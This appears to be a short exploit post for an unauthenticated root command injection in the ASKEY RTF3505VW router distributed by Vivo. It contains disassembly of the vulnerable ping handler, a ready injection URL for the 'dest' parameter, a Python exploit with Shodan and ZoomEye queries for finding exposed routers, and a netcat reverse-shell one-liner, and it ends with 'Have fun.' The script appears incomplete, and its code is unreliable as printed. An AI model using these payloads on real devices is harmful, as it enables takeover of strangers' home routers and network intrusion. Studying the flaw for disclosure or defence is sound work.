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Created March 29, 2021 18:42
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Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter
The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below.
if (iVar1 != 0) {
system("killall ping traceroute > /dev/null 2>&1");
__format = "ping %s -c %s -I %s> %s&";
puVar4 = auStack10144;
glbPingTraceFlag = 1;
LAB_00439f2c XREF[1]: 00439dbc(j)
00439f2c 8f 99 87 d0 lw t9,-0x7830(gp)=>->sprintf = 00462750
00439f30 03 20 f8 09 jalr t9=>sprintf int sprintf(char * __s, char * _
00439f34 27 a7 00 20 _addiu a3,sp,0x20
00439f38 8f bc 00 18 lw gp,local_2878(sp)
00439f3c 8f 99 8c c8 lw t9,-0x7338(gp)=>->system = 004613e0
00439f40 03 20 f8 09 jalr t9=>system int system(char * __command)
00439f44 27 a4 01 70 _addiu a0,sp,0x170
00439f48 8f bc 00 18 lw gp,local_2878(sp)
00439f4c 24 03 00 01 li v1,0x1
00439f50 8f 82 80 54 lw v0,-0x7fac(gp)=>->glbPingTraceFlag = 00495440
00439f54 08 10 e6 ec j LAB_00439bb0
00439f58 a0 43 00 00 _sb v1,0x0(v0)=>glbPingTraceFlag
The vulnerable path is "/webClient/ajax_getvar.cmd?varName=utilPing&dest=%3bls>/var/ping_trace.log%26%23&num=1&seq=0", and the command injection occurs on the "dest" parameter. To be possible to see the response of the executed command it is necessary to append the output to the "/var/ping_trace.log" file, so we can make another request and by changing the "seq" value to "1" we can see the output.
#!/usr/bin/env python3
# ZoomEye query : instaladorvivofibra +headers:X-XSS-Protection
# Shodan query : html:instaladorvivofibra X-XSS-Protection
import requests , urllib.parse
from argparse import ArgumentParser
def send_requests(cmd,ip) :
url = "http://{}/webClient/ajax_getvar.cmd?varName=utilPing&dest=%3b{}>/var/ping_trace.log%26%23&num=1&seq={}"
s1 = requests.get(url.format(ip,cmd,0))
s2 = requests.get(url.format(ip,cmd,1))
return s2.text
def main(arg) :
if arg.cmd :
cmd = urllib.parse.quote(arg.cmd)
else :
cmd = ""
while cmd != "exit" :
cmd = input("# ")
cmd = urllib.parse.quote(cmd)
if __name__ == '__main__' :
parser = ArgumentParser(description="VIVO RCE")
parser.add_argument("-t", "--target", dest="target",help="Target")
parser.add_argument("-c","--cmd", dest="cmd",help="Command")
args = parser.parse_args()
To reverse connect to the router, just do
$ mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
you'll probably need to change the fd until it works. Have fun.
thx crippa
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